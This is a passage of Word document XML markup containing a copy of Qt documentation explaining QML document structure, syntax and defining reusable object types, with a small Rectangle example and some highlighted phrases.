          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A QML document consists of two sections: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the imports section</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object declaration section</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The imports section in a document contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import statements</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that define which QML object types and JavaScript resources the document is able to use. The object declaration section defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be created when instantiating the object type defined by the document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An example of a simple document is as follows:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    width</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300</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    height</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200</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId343" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Structure of a QML Document</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="syntax-of-the-qml-language"/>
      <w:bookmarkStart w:id="422" w:name="_Toc483000621"/>
      <w:bookmarkStart w:id="423" w:name="_Toc483003638"/>
      <w:bookmarkStart w:id="424" w:name="_Toc483603974"/>
      <w:bookmarkStart w:id="425" w:name="_Toc483605194"/>
      <w:bookmarkEnd w:id="421"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Syntax of the QML Language</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
      <w:bookmarkEnd w:id="423"/>
      <w:bookmarkEnd w:id="424"/>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The object declaration section of the document </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must specify a valid object hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with appropriate</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId344" w:history="1">
        <w:r w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML syntax</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. An object declaration may include the specification of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId345" w:history="1">
        <w:r w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object attributes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Object method attributes may be specified as JavaScript functions, and object property attributes may be assigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId346" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property binding expressions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please see the documentation about the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId347" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>syntax of QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about valid syntax, and see the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId348" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>integrating QML and JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information on that topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc483000622"/>
      <w:bookmarkStart w:id="427" w:name="_Toc483003639"/>
      <w:bookmarkStart w:id="428" w:name="_Toc483603975"/>
      <w:bookmarkStart w:id="429" w:name="_Toc483605195"/>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Object Types through QML Documents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
      <w:bookmarkEnd w:id="427"/>
      <w:bookmarkEnd w:id="428"/>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As described briefly in the previous section, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document implicitly defines a QML object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. One of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>core principles of QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ability to define and then re-use object types</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>improves the maintainability of QML code</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>increases the readability of object hierarchy declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>promotes separation between UI definition and logic implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the following example, the client developer defines a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type with a document in a file:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Button.qml</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kwd"/>
